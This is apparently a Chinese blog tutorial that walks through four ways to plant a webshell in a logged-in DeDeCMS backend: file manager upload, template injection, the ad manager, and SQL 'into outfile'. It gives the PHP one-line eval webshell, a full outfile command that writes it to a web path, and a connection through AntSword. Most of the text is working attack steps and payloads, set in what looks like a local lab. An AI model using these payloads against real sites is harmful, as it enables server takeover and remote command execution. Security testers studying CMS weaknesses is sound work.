CMS漏洞-DeDeCMS篇

一.姿势一:通过⽂件管理器上传WebShell

1.首先我们搭建网站然后进行登录

2.模块👉文件管理器👉文件上传

3.新建一个1.php文件,内容为:

<?php phpinfo();?>

选择1.php文件上传

4.访问网站根目录下的1.php,发现代码成功执行,说明我们的木马上传成功!!

二.姿势二:修改模板文件拿WebShell

1.模板👉默认模板管理👉index.htm👉修改

2.插入代码:

<?php phpinfo();?>并保存

3.生成👉更新主机html,主页位置修改为index.php,生成静态,更新主页html

4.访问主页,发现主页为phpinfo界面,说明我们植入的代码有效!

三.姿势三:后台任意命令执⾏拿WebShell

1.模块👉广告管理

在内容上写入代码:

<?php phpinfo();?>

2.上传成功后查看代码,并复制引号内容

3.访问后发现页面无回显

4.现在我们将代码换为一句话木马:

<?php @eval($_POST[cmd]);?>

5.跟上述步骤一样复制引号内容并访问

6.使用蚁剑连接,连接成功!!

说明木马成功植入

四.姿势四:通过后台sql命令执⾏拿webshell

1.系统👉sql命令行工具

在命令行输入select @@basedir;

获取mysql路径,由此猜测⽹站绝对路径

2.在命令行输入:

select '<?php @eval($_POST[cmd]);?>' into outfile 'D:/phpstudy_pro/WWW/dedecms/uploads/webshell.php'

上传一句话木马到webshell.php文件

3.我们在网站根目录下发现了webshell.php文件,内容为一句话木马

4.我们访问木马文件并复制其绝对路径

5.连接成功!

木马植入成功!

相关推荐
Lingxw_w1 小时前
【网络安全】——大端序(Big-Endian)和小端序(Little-Endian)
安全·web安全
小白学安全hhhh2 小时前
FlySecAgent:——MCP全自动AI Agent的实战利器
安全·ai·ai安全
码哝小鱼2 小时前
系统间安全复制和同步文件
linux·服务器·安全
alden_ygq2 小时前
Kubernetes生产实战(十四):Secret高级使用模式与安全实践指南
java·安全·kubernetes
_只道当时是寻常3 小时前
【网络入侵检测】基于源码分析Suricata的IP分片重组
网络·安全·网络安全·安全威胁分析
画中有画5 小时前
一种安全不泄漏、高效、免费的自动化脚本平台
运维·安全·自动化·自动化脚本
极小狐9 小时前
如何使用极狐GitLab 软件包仓库功能托管 maven?
java·运维·数据库·安全·c#·gitlab·maven
Codingwiz_Joy15 小时前
Day28 -js开发01 -JS三个实例:文件上传 & 登录验证 & 购物商城 & ---逻辑漏洞复现 及 判断js的payload思路
开发语言·javascript·安全·安全性测试
程序员的世界你不懂16 小时前
tomcat6性能优化
前端·性能优化·firefox
琢磨先生David18 小时前
Java 24:重构数字信任边界 —— 后量子时代的智能安全防御体系构建
java·安全·重构